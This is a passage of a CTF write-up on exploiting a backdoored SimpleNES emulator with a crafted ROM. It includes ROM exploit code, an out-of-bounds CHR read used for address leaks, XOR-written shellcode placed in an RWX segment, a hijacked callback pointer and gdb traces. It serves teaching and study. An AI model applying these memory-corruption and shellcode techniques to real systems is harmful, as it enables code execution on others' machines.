Backdooredness Asis 2023
Introduction⌗
Last weekend, I participated in ASIS CTF. While I did not manage to solve this challenge during the competition, I did manage to upsolve it afterwards with some limited help from the author!
Credits⌗
During the CTF I made the mistake of trying to write my exploit primarily in assembly. In retrospect this was not ideal: a higher-level language like C takes away the responsibility of managing the stack and gives me access to 32-bit integer types. The player who solved the challenge, ptr-yudai, posted their solution, and I in turn used some of the helper functions they had made. However, my exploitation method and vulnerability were different. Since I used some of their code and templating, I wanted to give credit where it is due! Please check out their amazing blog @ https://ptr-yudai.hatenablog.com/
About⌗
This challenge involves exploiting an NES emulator called SimpleNES. On top of the standard source code, the challenge adds 2 opcodes, bka and bkx, as well as a 64-bit register, bk_off. The NES is programmed in 6502 assembly, which works with a handful of 8-bit registers; the one of chief concern here is AC (r_A), the accumulator. For more information, the language spec is detailed here.
The challenge consists of creating a ROM that exploits the emulator. Once the ROM has been submitted, no further action is allowed from the client side. In other words, everything has to be handled by the ROM. Something I later realized is that stdin is also closed, making any kind of input impossible.
//CPU.cpp
case BKA:
bk_off = (bk_off << 8) + r_A;
break;
case BKX:
m_bus.xorAt(bk_off, r_A);
break;
void MainBus::xorAt(uint64_t off, Byte value)
{
// Exfil the byte and hide the output from user
syscall(STDOUT_FILENO,1,(void *)&m_RAM[off],1);
syscall(STDOUT_FILENO,1,(void *)"\r",1);
m_RAM[off] ^= value;
}
The bka opcode shifts the bk_off register left by 8 bits and adds the AC register into the low byte. The bkx opcode calls MainBus's xorAt function, which XORs the byte at m_RAM + bk_off with the value in AC. It also leaks the old byte back to the user on stdout, but not to the ROM. Since bk_off is never bounds checked, the 2 opcodes combine into a write primitive at any 64-bit offset from m_RAM.
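To make the two opcodes concrete, here is a minimal Python model of them. It is only a sketch of the semantics quoted above: the `Backdoor` class and the `load_offset` helper are names I made up for illustration, and a small `bytearray` stands in for `m_RAM` (the real primitive is not bounds checked, which is the whole point).

```python
MASK64 = (1 << 64) - 1

class Backdoor:
    """Toy model of the bka/bkx opcodes (names are illustrative)."""

    def __init__(self, ram_size=0x800):
        self.bk_off = 0
        self.ram = bytearray(ram_size)  # stand-in for m_RAM

    def bka(self, a):
        # bk_off = (bk_off << 8) + r_A, truncated to 64 bits
        self.bk_off = ((self.bk_off << 8) + (a & 0xFF)) & MASK64

    def bkx(self, a):
        # m_RAM[bk_off] ^= r_A; returns the old byte, which the real
        # emulator writes to stdout instead of handing it to the ROM
        old = self.ram[self.bk_off]
        self.ram[self.bk_off] = old ^ (a & 0xFF)
        return old

def load_offset(bd, offset):
    # Eight bka calls, most significant byte first, fill the register.
    for shift in range(56, -8, -8):
        bd.bka((offset >> shift) & 0xFF)

bd = Backdoor()
bd.ram[0x123] = 0x41
load_offset(bd, 0x123)
leaked = bd.bkx(0x41 ^ 0x90)  # XOR with old ^ wanted to store 0x90
print(hex(bd.bk_off), hex(leaked), hex(bd.ram[0x123]))
```

Because the write is an XOR, storing a chosen byte requires knowing what is already there, which is why the lack of a leak into the ROM matters so much later on.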
Trigger vuln from ROM⌗
;pwn_asm.s
.export _bka
.export _bkx
_bka:
.byte $13
rts
_bkx:
.byte $37
rts
//pwn.c
extern void bka(uint8_t a);
extern void bkx(uint8_t a);
void reset() {
//bka(0); bka(0); bka(0); bka(0);
bka(0); bka(0); bka(0); bka(0);
}
void xorAt64(uint32_t ofs_low, uint32_t ofs_high, uint8_t value) {
int i;
for (i = 0; i < 4; i++) bka((ofs_high >> ((3-i)*8)) & 0xff);
for (i = 0; i < 4; i++) bka((ofs_low >> ((3-i)*8)) & 0xff);
bkx(value);
reset();
}
void xorAt(uint32_t offset, uint8_t value) {
int i;
for (i = 0; i < 4; i++) bka((offset >> ((3-i)*8)) & 0xff);
bkx(value);
reset();
}
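One detail worth checking is why `reset()` only needs four `bka(0)` calls even though `bk_off` is 64 bits wide. The sketch below models the register in Python (the function names are mine, not from the challenge): every helper shifts in at least four bytes, so the four zero bytes plus the next call's four or eight bytes always push the stale offset out of the register.

```python
MASK64 = (1 << 64) - 1

def bka(bk_off, a):
    # Same update as the BKA opcode, truncated to 64 bits.
    return ((bk_off << 8) + (a & 0xFF)) & MASK64

def shift_in(bk_off, value, nbytes):
    # Feed `value` one byte at a time, most significant byte first.
    for i in range(nbytes - 1, -1, -1):
        bk_off = bka(bk_off, (value >> (8 * i)) & 0xFF)
    return bk_off

def reset(bk_off):
    return shift_in(bk_off, 0, 4)

bk_off = shift_in(0, 0x00002A5A219117E0, 8)  # xorAt64 loads 8 bytes
bk_off = reset(bk_off)
after_reset = bk_off                         # low half moved up, not yet zero
bk_off = shift_in(bk_off, 0x3FB108, 4)       # xorAt loads 4 bytes
print(hex(after_reset), hex(bk_off))
```

The register is not actually zero after `reset()`, but it does not need to be: the leftover bytes sit in the upper half and are shifted out before the next `bkx`.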
Constraints⌗
While we do get to write anywhere relative to m_RAM, there is no given way to leak addresses into the ROM's memory. A leak is necessary to write to higher addresses, because the ROM has to compute their offset from m_RAM by itself. This will be addressed later.
Compiling the ROM⌗
The ROM can be compiled with the cc65 package. I used the following makefile to build it. (Thanks again to ptr-yudai for helping me figure out how to get C compilation working.)
all:
cc65 -O -t c64 pwn.c
ca65 -t c64 pwn.s
ca65 -t c64 pwn_asm.s
cl65 -o ../pwn.nes -t nes pwn.o pwn_asm.o
Attack Vector⌗
To start out, I want to discuss my chosen attack vector. I noticed that a series of callbacks is created for reading and writing special physical addresses. This struck me as a solid target, because overwriting one should give me a way to trigger code!
Callback assignment⌗
Emulator::Emulator() :
m_cpu(m_bus),
m_ppu(m_pictureBus, m_emulatorScreen),
m_screenScale(3.f),
m_cycleTimer(),
m_cpuCycleDuration(std::chrono::nanoseconds(559))
{
if(!m_bus.setReadCallback(PPUSTATUS, [&](void) {return m_ppu.getStatus();}) ||
!m_bus.setReadCallback(PPUDATA, [&](void) {return m_ppu.getData();}) ||
!m_bus.setReadCallback(JOY1, [&](void) {return m_controller1.read();}) ||
!m_bus.setReadCallback(JOY2, [&](void) {return m_controller2.read();}) ||
!m_bus.setReadCallback(OAMDATA, [&](void) {return m_ppu.getOAMData();}))
{
LOG(Error) << "Critical error: Failed to set I/O callbacks" << std::endl;
}
if(!m_bus.setWriteCallback(PPUCTRL, [&](Byte b) {m_ppu.control(b);}) ||
!m_bus.setWriteCallback(PPUMASK, [&](Byte b) {m_ppu.setMask(b);}) ||
!m_bus.setWriteCallback(OAMADDR, [&](Byte b) {m_ppu.setOAMAddress(b);}) ||
!m_bus.setWriteCallback(PPUADDR, [&](Byte b) {m_ppu.setDataAddress(b);}) ||
!m_bus.setWriteCallback(PPUSCROL, [&](Byte b) {m_ppu.setScroll(b);}) ||
!m_bus.setWriteCallback(PPUDATA, [&](Byte b) {m_ppu.setData(b);}) ||
!m_bus.setWriteCallback(PUTC, [&](Byte b) {putchar(b);}) ||
!m_bus.setWriteCallback(OAMDMA, [&](Byte b) {DMA(b);}) ||
!m_bus.setWriteCallback(JOY1, [&](Byte b) {m_controller1.strobe(b); m_controller2.strobe(b);}) ||
!m_bus.setWriteCallback(OAMDATA, [&](Byte b) {m_ppu.setOAMData(b);}))
{
LOG(Error) << "Critical error: Failed to set I/O callbacks" << std::endl;
}
m_ppu.setInterruptCallback([&](){ m_cpu.interrupt(InterruptType::NMI); });
}
So, I decided to check this out with a debugger. As a quick aside, for debugging these challenges where a dockerfile is provided, I like to modify it to install git, gdb, and vim and debug from within the docker instance. Sometimes I debug locally as well, but for the most part I think it is better to stay as true to the target environment as possible.
ROM script to debug⌗
//JOY1 = 0x4016
void debug(){
while(1) *(uint8_t*)JOY1 = 1;
}
int main(void) {
debug();
}
All this does is loop a write to JOY1, which will allow me to test my attack idea.
I found the callback list in memory by using the information provided. By searching for the pointer to m_RAM, I can find the MainBus object, which has a pointer to the callback table.
gdb-peda$ find 0x5555570e1220
Searching for '0x5555570e1220' in: None ranges
Found 1 results, display max 1 items:
[stack] : 0x7ffdb5a026d0 --> 0x5555570e1220 --> 0x7da0000
gdb-peda$ x/10gx 0x7ffdb5a026d0
0x7ffdb5a026d0: 0x00005555570e1220 0x00005555570e1a20
0x7ffdb5a026e0: 0x00005555570e1a20 0x00005555574e1bf0
0x7ffdb5a026f0: 0x00005555574e3bf0 0x00005555574e3bf0
0x7ffdb5a02700: 0x00005555571840a0 0x00005555574dc170
0x7ffdb5a02710: 0x000000000000000d 0x00005555574dc3e0
gdb-peda$ x/10gx 0x00005555574dc3e0
0x5555574dc3e0: 0x00005555574dc3a0 0x00007ffb00002004
0x5555574dc3f0: 0x00007ffdb5a026d0 0x0000000000000000
0x5555574dc400: 0x00007ffbceb8d3d8 0x00007ffbceb8d396
0x5555574dc410: 0x00005555574d9d80 0x0000000000000031
0x5555574dc420: 0x706d742f706d742f 0x6b6d6f3533763835
gdb-peda$ x/10gx 0x00005555574dc3a0
0x5555574dc3a0: 0x00005555574dc360 0x00007ffb00004016 <- addr 0x4016!
0x5555574dc3b0: 0x00007ffdb5a026d0 0x0000000000000000
0x5555574dc3c0: 0x00007ffbceb8d2c9 0x00007ffbceb8d287 <- function ptrs
0x5555574dc3d0: 0x00005555574d9d40 0x0000000000000041
0x5555574dc3e0: 0x00005555574dc3a0 0x00007ffb00002004
To test my idea, I just need to change the function pointers to dummy values.
gdb-peda$ set *0x5555574dc3c0 = 0x4141414141
gdb-peda$ set *0x5555574dc3c4 = 0x4141414141
gdb-peda$ set *0x5555574dc3c8 = 0x4242424242
gdb-peda$ set *0x5555574dc3cc = 0x4242424242
gdb-peda$ x/10gx 0x00005555574dc3a0
0x5555574dc3a0: 0x00005555574dc360 0x00007ffb00004016
0x5555574dc3b0: 0x00007ffdb5a026d0 0x0000000000000000
0x5555574dc3c0: 0x4141414141414141 0x4242424242424242
0x5555574dc3d0: 0x00005555574d9d40 0x0000000000000041
0x5555574dc3e0: 0x00005555574dc3a0 0x00007ffb00002004
Since I am looping over a write to JOY1, let's see if continuing gives a crash.
gdb-peda$ c
Continuing.
Thread 1 "ld-linux-x86-64" received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x5555574dc3b0 --> 0x7ffdb5a026d0 --> 0x5555570e1220 --> 0x7da0000
RBX: 0x4242424242424242 ('BBBBBBBB')
RCX: 0x5555574dc3a8 --> 0x7ffb00004016
RDX: 0x7ffdb5a01dc4 --> 0x574dc3b000007f01
RSI: 0x7ffdb5a01dc4 --> 0x574dc3b000007f01
RDI: 0x5555574dc3b0 --> 0x7ffdb5a026d0 --> 0x5555570e1220 --> 0x7da0000
RBP: 0x7ffdb5a01de0 --> 0x7ffdb5a01e20 --> 0x7ffdb5a01e70 --> 0x7ffdb5a01eb0 --> 0x7ffdb5a01f70 --> 0x7ffdb5a02bb0 (--> ...)
RSP: 0x7ffdb5a01dc0 --> 0x7f01b5a01de0
RIP: 0x7ffbceb96de4 (call rbx)
R8 : 0xff
R9 : 0x7ffb910f2010 --> 0x0
R10: 0x7ffdb5a01e90 --> 0x8d007ffdb5a02840
R11: 0x7ffdb5b8c080 (MemError)
R12: 0x1
R13: 0x7ffbceb80f29 (endbr64)
R14: 0x7ffbcebb7310 --> 0x7ffbceb80ee0 (endbr64)
R15: 0x7ffbcebf3040 --> 0x7ffbcebf42f0 --> 0x7ffbceb5d000 --> 0x10102464c457f
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x7ffbceb96dda: mov rax,QWORD PTR [rbp-0x18]
0x7ffbceb96dde: mov rsi,rdx
0x7ffbceb96de1: mov rdi,rax
=> 0x7ffbceb96de4: call rbx
0x7ffbceb96de6: nop
0x7ffbceb96de7: mov rbx,QWORD PTR [rbp-0x8]
0x7ffbceb96deb: leave
0x7ffbceb96dec: ret
Guessed arguments:
arg[0]: 0x5555574dc3b0 --> 0x7ffdb5a026d0 --> 0x5555570e1220 --> 0x7da0000
arg[1]: 0x7ffdb5a01dc4 --> 0x574dc3b000007f01
arg[2]: 0x7ffdb5a01dc4 --> 0x574dc3b000007f01
[------------------------------------stack-------------------------------------]
0000| 0x7ffdb5a01dc0 --> 0x7f01b5a01de0
0008| 0x7ffdb5a01dc8 --> 0x5555574dc3b0 --> 0x7ffdb5a026d0 --> 0x5555570e1220 --> 0x7da0000
0016| 0x7ffdb5a01dd0 --> 0x7ffdb5a01e10 --> 0x0
0024| 0x7ffdb5a01dd8 --> 0x7ffdb5a026d0 --> 0x5555570e1220 --> 0x7da0000
0032| 0x7ffdb5a01de0 --> 0x7ffdb5a01e20 --> 0x7ffdb5a01e70 --> 0x7ffdb5a01eb0 --> 0x7ffdb5a01f70 --> 0x7ffdb5a02bb0 (--> ...)
0040| 0x7ffdb5a01de8 --> 0x7ffbceb95d04 (jmp 0x7ffbceb96013)
0048| 0x7ffdb5a01df0 --> 0x4016b5a01e01
0056| 0x7ffdb5a01df8 --> 0x7ffdb5a026d0 --> 0x5555570e1220 --> 0x7da0000
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00007ffbceb96de4 in ?? ()
gdb-peda$
Perfect, a SEGFAULT on a call to rbx with the injected value inside, which proves the exploitation vector is valid.
Bad News⌗
Since I have no way to leak any values, there is really nothing of use I can put in here quite yet. I looked for a while to see if there were any gadgets I could reach by changing only the lower 12 bits, but couldn't find anything. This is where I got stuck during the CTF. I tried many things revolving around reading from MainBus memory, but got nowhere. I knew I needed the leak, but couldn't find it…
Dream Come True⌗
After a long night filled with restless thoughts of a challenge not yet completed, I awoke to a joyous sight. In addition to some details from the only person who solved the challenge, ptr-yudai, the challenge author said: "Intended way to get leaks was using oob in dream memory handler. It doesn't bound check its x * 0x2000+y". So, I set forth on a mission to figure out how to get the leaks from this.
I found the vulnerable code, which matches the description, in readCHR. The address is range checked, but nothing checks that chrbank * 0x2000 stays inside the CHR ROM.
//MapperColorDreams.cpp
Byte MapperColorDreams::readCHR(Address address)
{
if (address <= 0x1FFF)
{
return m_cartridge.getVROM()[(chrbank * 0x2000) + address];
}
return 0;
}
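The index arithmetic in readCHR can be modelled in a few lines of Python. This is a sketch under the assumption that the ROM ships a single 8KB CHR bank (as the header log later in this post reports); `chr_index` and `is_out_of_bounds` are illustrative names, not emulator functions.

```python
CHR_BANK_SIZE = 0x2000

def chr_index(chrbank, address):
    """Index used by readCHR, or None when the handler returns 0."""
    if address <= 0x1FFF:
        return chrbank * CHR_BANK_SIZE + address
    return None

def is_out_of_bounds(chrbank, address, vrom_len):
    # True when the computed index falls past the end of the CHR buffer.
    idx = chr_index(chrbank, address)
    return idx is not None and idx >= vrom_len

vrom_len = 1 * CHR_BANK_SIZE  # one 8KB CHR bank
print(hex(chr_index(0, 0x3F0)), is_out_of_bounds(0, 0x3F0, vrom_len))
print(hex(chr_index(1, 0x3F0)), is_out_of_bounds(1, 0x3F0, vrom_len))
```

With chrbank at 0 every valid address stays inside the buffer; any non-zero bank on a one-bank ROM lands in whatever follows the CHR allocation on the heap.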
MapperColorDreams class⌗
class MapperColorDreams : public Mapper
{
public:
MapperColorDreams(Cartridge &cart, std::function<void(void)> mirroring_cb);
NameTableMirroring getNameTableMirroring();
void writePRG(Address address, Byte value);
Byte readPRG(Address address);
Byte readCHR(Address address);
void writeCHR(Address address, Byte value);
private:
NameTableMirroring m_mirroring;
uint32_t prgbank;
uint32_t chrbank; //<- value used for calculating the chrbank offset
std::function<void(void)> m_mirroringCallback;
};
The cartridge mapper is selected at runtime based on the ROM header. If the header specifies mapper 11 (0xb), this mapper is chosen when the mapper is created. I set this value in Python before uploading the ROM.
upload.py⌗
r = remote("localhost", 1337)
with open("./pwn.nes", "rb") as f:
    data = list(f.read())
    #patch in dream mapper
    data[6] = (data[6] & 0x0f) | (11 << 4)
    to_send = hexlify(bytes(data))
    #log.info(f"sending data> {to_send}")
    r.sendlineafter(':\n', to_send)
    with open("./test.nes", "wb") as out:
        out.write(bytes(data))
    f.close()
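For reference, the header patch can be wrapped in a small helper. This is a sketch based on the iNES header layout, where the mapper's low nibble lives in the high nibble of byte 6 and its high nibble in the high nibble of byte 7; the snippet above only touches byte 6, which is enough for mapper 11 when byte 7 is already zero. `patch_mapper` and `mapper_number` are hypothetical helper names.

```python
def patch_mapper(rom: bytes, mapper: int) -> bytes:
    """Return a copy of an iNES image with the given mapper number."""
    if rom[:4] != b"NES\x1a":
        raise ValueError("not an iNES image")
    data = bytearray(rom)
    data[6] = (data[6] & 0x0F) | ((mapper & 0x0F) << 4)  # mapper low nibble
    data[7] = (data[7] & 0x0F) | (mapper & 0xF0)         # mapper high nibble
    return bytes(data)

def mapper_number(rom: bytes) -> int:
    return (rom[7] & 0xF0) | (rom[6] >> 4)

# 16-byte header: magic, 2 PRG banks, 1 CHR bank, flags 6 = 0x03, flags 7 = 0
header = b"NES\x1a" + bytes([2, 1, 0x03, 0x00]) + bytes(8)
patched = patch_mapper(header, 11)
print(mapper_number(patched), hex(patched[6]))
```

The flag bits in the low nibble of byte 6 (mirroring, battery RAM) are left untouched, so only the mapper selection changes.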
A key thing to note is that the Mapper is dynamically allocated. This can be confirmed by looking at the disassembly; see the operator new() call.
Bug⌗
The OOB is pretty simple: by corrupting the chrbank value on the heap using our write primitive, we can then read outside of the allocated CHR memory. All that is needed is the offset to the heap object for the dream mapper, and then the xor primitive can be used to set chrbank to whatever we want. In this case 1 will suffice.
xorAt64(DREAM_OFF+0x1c, 0, LD_PAGE & 0xff);
The next step is to read from CHR memory, which can be done like this:
uint8_t get_data(uint16_t addr){
//write the address to PPUADDR
uint8_t a = (addr >> 8) & 0xff, b = addr &0xff;
*(uint8_t*)(PPUADDR) = a;
*(uint8_t*)(PPUADDR) = b;
//read the value at chrbank+addr and return
return *(uint8_t*)PPUDATA;
}
//helper function to handle leaking
void leak(uint16_t offset, uint32_t* high, uint32_t* low){
uint8_t i = 0;
get_data(0);
for(i = 0; i < 4; i++)
*low |= (uint32_t)get_data(offset+i+1)<<(i*8);
for(i = 0; i < 4; i++)
*high |= (uint32_t)get_data(offset+i+5)<<(i*8);
get_data(0);
}
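Since cc65 has no 64-bit integer type, the leak helper rebuilds each pointer as two 32-bit halves, least significant byte first. The Python sketch below shows just that reassembly step (not the PPU reads themselves); the function names are mine, and the sample bytes are one of the pointers from the debug dump kept as a comment in the full code.

```python
def assemble_le(byte_values):
    """OR bytes into one value, least significant byte first."""
    value = 0
    for i, b in enumerate(byte_values):
        value |= (b & 0xFF) << (8 * i)
    return value

def split_leak(raw8):
    # First four bytes form the low half, next four the high half.
    low = assemble_le(raw8[:4])
    high = assemble_le(raw8[4:8])
    return low, high

raw = bytes.fromhex("e8c3cda1697f0000")  # 0x00007f69a1cdc3e8 in memory order
low, high = split_leak(raw)
print(hex(low), hex(high), hex((high << 32) | low))
```

Note that the C helper accumulates with `|=`, so the caller has to zero `low` and `high` before each call, which is what the next snippet does.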
Next, calculate the addresses for the values to be leaked. In my case, I chose 2 values, ld and heap. I will explain my choice in the next section.
leak vals⌗
uint32_t rwx_low, rwx_high;
uint32_t mram_low, mram_high;
rwx_low = rwx_high = 0;
//ld
leak(LD_OFF, &rwx_high, &rwx_low);
rwx_low -= RWX_OFF;
rwx_low &= 0xFFFFFF00;
mram_low = mram_high = 0;
//heap
leak(HEAP_OFF, &mram_high, &mram_low);
mram_low -= M_RAM_OFF; //set the heap leak to m_RAM
What I missed⌗
The key thing I missed during the competition was the presence of the PPU and PictureBus. I will leave it to you to review the source code and figure out what they do, but the important thing is that they provide another way to read memory. During the CTF I searched for bugs in the MainBus, overlooking CHR memory entirely. Had I looked a bit closer at the read/write callbacks I had access to, I might have noticed the PPUADDR and PPUDATA callbacks. Thus, my resolution for 2024 is to read more source code!
RWX⌗
One thing I noticed while poking around with the debugger is that there is a RWX segment of memory in ld. As discussed before, I can overwrite the callback function for JOY1 to call anywhere I want, so why not call some shellcode? This is exactly what I ended up doing.
To do this, I will use the aforementioned xorAt function to write the shellcode to the section. For this, I need to calculate the offset between m_RAM and the RWX segment.
uint32_t mram_rwx_off_low, mram_rwx_off_high;
sub64(rwx_low, rwx_high, mram_low, mram_high, &mram_rwx_off_low, &mram_rwx_off_high);
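The sub64 helper (listed in the full code) subtracts two 64-bit values using only 32-bit halves, borrowing from the high half when the low half underflows. Here is a Python sketch of the same logic, checked against the addresses printed in the run log further down; `split` is a helper I added for the example.

```python
MASK32 = 0xFFFFFFFF

def sub64(al, ah, bl, bh):
    """(ah:al) - (bh:bl) using only 32-bit arithmetic; returns (low, high)."""
    xl = (al - bl) & MASK32
    borrow = 1 if al < bl else 0
    xh = (ah - bh - borrow) & MASK32
    return xl, xh

def split(v):
    # Split a 64-bit value into (low, high) 32-bit halves.
    return v & MASK32, (v >> 32) & MASK32

rwx, m_ram = 0x7FAF77A11A00, 0x555556100220  # values from the run log
low, high = sub64(*split(rwx), *split(m_ram))
print(hex((high << 32) | low))
```

The result is the value that gets shifted into bk_off, so that m_RAM + bk_off lands on the RWX segment.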
Next, I write the shellcode to this offset. There is some existing data there, but it is easy enough to handle: the data is always the same, so I can xor my shellcode against it before writing.
uint8_t i,j;
for(i = 0; i < SHELLCODE_SZ; i++)
shellcode[i] ^= pattern[i%0x10];
//create nopsled
for(i = 0; i < 0x10; i++)
pattern[i] ^= 0x90;
//sometimes values are slightly different, so I spray a few times
for(j = 0; j < SPRAY_CNT;j++){
for(i = 0; i < 0xb0; i++){
xorAt64(mram_rwx_off_low+i, mram_rwx_off_high, pattern[i%0x10]);
}
mram_rwx_off_low+= 0xb0;
//write shellcode
for(i = 0; i < SHELLCODE_SZ; i++)
xorAt64(mram_rwx_off_low+i, mram_rwx_off_high, shellcode[i]);
mram_rwx_off_low += 0x50;
}
mram_rwx_off_low -= SPRAY_CNT*0x100;
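The pre-XOR step is easy to get wrong, so here is a small Python sketch of the idea, assuming the target region holds the repeating 16-byte pattern used in the exploit. `premask` and `xor_write` are illustrative names, and the `bytearray` is only a stand-in for the RWX region.

```python
def premask(wanted, existing):
    """Bytes to XOR-write so that existing memory becomes `wanted`."""
    return bytes(w ^ existing[i % len(existing)] for i, w in enumerate(wanted))

def xor_write(memory, offset, data):
    # Mirrors the bkx primitive: each byte is XORed in place.
    for i, b in enumerate(data):
        memory[offset + i] ^= b

pattern = bytes([0x64, 0x4C, 0x8B, 0x1C, 0x25, 0x28, 0xFF, 0xFF,
                 0xFF, 0x41, 0xFF, 0xA3, 0x18, 0x3C, 0x00, 0x00])
memory = bytearray(pattern * 4)  # stand-in for the RWX region
wanted = bytes([0x90] * 16) + bytes([0x48, 0x31, 0xD2, 0x48, 0x31, 0xC0])
xor_write(memory, 0, premask(wanted, pattern))
print(memory[:len(wanted)].hex())
```

This only works when the write starts on a boundary of the 16-byte pattern, which is presumably why the exploit keeps its offsets and the shellcode array aligned to 0x10.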
shellcode⌗
0: 48 31 d2 xor rdx,rdx
3: 48 31 c0 xor rax,rax
6: 48 31 f6 xor rsi,rsi
9: 48 bb 6c 6f 6c 6c 6f movabs rbx,0x746c6c6f6c6c6f6c ;'lollollt'
10: 6c 6c 74
13: 48 c1 eb 38 shr rbx,0x38
17: 53 push rbx
18: 48 bb 2f 66 6c 61 67 movabs rbx,0x78742e67616c662f ;'/flag.tx'
1f: 2e 74 78
22: 53 push rbx
23: 48 89 e7 mov rdi,rsp
26: b0 02 mov al,0x2
28: 0f 05 syscall ;int fd = open('/flag.txt', O_RDONLY, 0);
2a: 48 89 c7 mov rdi,rax
2d: 48 31 c0 xor rax,rax
30: 48 89 e6 mov rsi,rsp
33: ba 00 01 00 00 mov edx,0x100
38: 0f 05 syscall ;n = read(fd, rsp, 0x100);
3a: 48 89 c2 mov rdx,rax
3d: b8 01 00 00 00 mov eax,0x1
42: bf 01 00 00 00 mov edi,0x1
47: 0f 05 syscall ;write(STDOUT, rsp, n);
//aligned to 0x10, necessary
uint8_t shellcode[] = { 0x90,
0x48,0x31,0xd2,0x48,0x31,0xc0,0x48,0x31,
0xf6,0x48,0xbb,0x6c,0x6f,0x6c,0x6c,0x6f,
0x6c,0x6c,0x74,0x48,0xc1,0xeb,0x38,0x53,
0x48,0xbb,0x2f,0x66,0x6c,0x61,0x67,0x2e,
0x74,0x78,0x53,0x48,0x89,0xe7,0xb0,0x02,
0x0f,0x05,0x48,0x89,0xc7,0x48,0x31,0xc0,
0x48,0x89,0xe6,0xba,0x00,0x01,0x00,0x00,
0x0f,0x05,0x48,0x89,0xc2,0xb8,0x01,0x00,
0x00,0x00,0xbf,0x01,0x00,0x00,0x00,0x0f,
0x05,0x00,0x00,0x00,0x00,0x00,0x00,};
uint8_t pattern[] = {0x64,0x4c,0x8b,0x1c,0x25,0x28,0xff,0xff,0xff,0x41,0xff,0xa3,0x18,0x3c,0x00,0x00}; //the bytes found in libc
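The two movabs/push pairs at the start of the shellcode build the path string on the stack without embedding a NUL byte in the immediates. The following Python sketch replays those two pushes to show what ends up at rsp; `push` is a toy model of the instruction, not real emulation.

```python
import struct

def push(stack, value):
    """Model `push r64`: the new qword lands below the previous one."""
    return struct.pack("<Q", value) + stack

stack = b""
stack = push(stack, 0x746C6C6F6C6C6F6C >> 0x38)  # shr leaves only 0x74, 't'
stack = push(stack, 0x78742E67616C662F)          # '/flag.tx'
path = stack.split(b"\x00", 1)[0]
print(path)
```

The shifted qword supplies both the final 't' and the terminating zero bytes, so rsp points at a complete C string when it is copied into rdi.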
Last Step⌗
All that is left is to overwrite the JOY1 callback function with the address of the shellcode. This is easier than one may expect, as the LD library is located right next to the Main Binary for SimpleNES. So, the address of the callback function can be computed based off previously leaked RWX address. From there, I xor the function pointer against the shellcode address, and use the xorAt primitive to corrupt the callback function for JOY1 write!
uint32_t joycon_cb_fn_low, overwrite;
overwrite = rwx_low;
joycon_cb_fn_low = rwx_low - JOYCON_CB_RWX_DIFF;
overwrite ^= joycon_cb_fn_low;
overwrite |= 0x800;
for(i = 0; i < 4; i++)
xorAt64(FUNC_OVERWRITE_OFF+i, 0, (overwrite >> (i*8)) & 0xFF);
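Because the primitive is an XOR, the value written is the difference between the pointer currently stored and the pointer we want, and only the low four bytes need touching when both share their upper half. A Python sketch of that idea follows; the current pointer is taken from the gdb dump earlier, while the target address and the helper names are hypothetical.

```python
MASK32 = 0xFFFFFFFF

def xor_delta(current, target):
    """Low 32 bits of the XOR difference between two pointers."""
    if current >> 32 != target >> 32:
        raise ValueError("upper halves must match")
    return (current ^ target) & MASK32

def apply_delta(memory, offset, delta):
    # Four single-byte XOR writes, least significant byte first.
    for i in range(4):
        memory[offset + i] ^= (delta >> (8 * i)) & 0xFF

current = 0x00007FFBCEB8D2C9  # callback pointer from the gdb dump
target = 0x00007FFBCEBF0800   # hypothetical shellcode address
slot = bytearray(current.to_bytes(8, "little"))
apply_delta(slot, 0, xor_delta(current, target))
print(hex(int.from_bytes(slot, "little")))
```

This is why the exploit has to predict the callback pointer's current value from the leak: a wrong guess for any byte leaves a corrupted pointer rather than the shellcode address.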
And that’s it! All that’s left to do is trigger the callback for JOY1 and enjoy our code execution.
*(uint8_t*)JOY1 = i;
while(1);
return 0;
Moment of Truth⌗
[gold3nboy@arch exp]$ ./upload.py
cc65 -O -t c64 pwn.c
ca65 -t c64 pwn.s
ca65 -t c64 pwn_asm.s
cl65 -o ../pwn.nes -t nes pwn.o pwn_asm.o
[+] Opening connection to localhost on port 1337: Done
/usr/lib/python3.11/site-packages/pwnlib/tubes/tube.py:841: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
res = self.recvuntil(delim, timeout=timeout)
[MainBus.cpp:12] Allocated m_RAM at: 0x555556100220
[Cartridge.cpp:52] Reading ROM from path: /tmp/tmpmctjnwke
[Cartridge.cpp:70] Reading header, it dictates:
[Cartridge.cpp:73] 16KB PRG-ROM Banks: 2
[Cartridge.cpp:81] 8KB CHR-ROM Banks: 1
[Cartridge.cpp:91] Name Table Mirroring: Vertical
[Cartridge.cpp:95] Mapper #: 11
[Cartridge.cpp:98] Extended (CPU) RAM: true
[Cartridge.cpp:112] ROM is NTSC compatible.
[Cartridge.cpp:121] Allocated m_PRG_ROM at: 0x555556502bd0
[Cartridge.cpp:127] Allocated m_CHR_ROM at: 0x55555650abe0
Error while enumerating udev devices
Setting vertical sync not supported
\x00
[*] rwx: 0x7faf77a11a00
[*] m_RAM: 0x555556100220
[*] m_RAM_rwx_off: 0x2a5a219117e0
[*] Switching to interactive mode
GGGGGASIS{test-flag}
One more thing: a shell cannot be spawned, as stdin is closed. It could be reopened, but I decided to just read and write the flag with shellcode instead. There is plenty of space to do whatever in the shellcode, so I’ll leave that to you.
Aside⌗
Because I do not know the heap layout on the remote server, I have been unable to get my exploit working on remote. I have tried dumping the entire heap, but can’t find where the Mapper is being allocated (I searched manually for a long time as well). If anyone has any advice for this, I’d love to hear it. For now, I am content with getting my exploit working on my local docker instance, as I feel I have completed the challenge.
Aside-Aside⌗
After I had given up, I finally had the idea to see if I could set chrbank some other way. It turns out I can. I was being stubborn, trying to find the heap allocation for the approach I already had working, when setting the value as intended is much easier. There is only one real change.
//xorAt64(DREAM_OFF+0x1c, 0, LD_PAGE & 0xff);
*(uint8_t*)0x9001 = 0x10; //write 0x10 to an address >= 0x8000, which sets chrbank = (0x10 >> 4) = 1
//this is the code that is triggered
void MapperColorDreams::writePRG(Address address, Byte value)
{
if (address >= 0x8000)
{
prgbank = ((value >> 0) & 0x3);
chrbank = ((value >> 4) & 0xF);
}
}
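A quick Python model of the bank-select write shows how far the intended path can reach. It mirrors the two lines of writePRG above; `decode_bank_write` and `max_chr_offset` are illustrative names.

```python
def decode_bank_write(value):
    """Mirror writePRG: low two bits pick prgbank, high nibble picks chrbank."""
    prgbank = (value >> 0) & 0x3
    chrbank = (value >> 4) & 0xF
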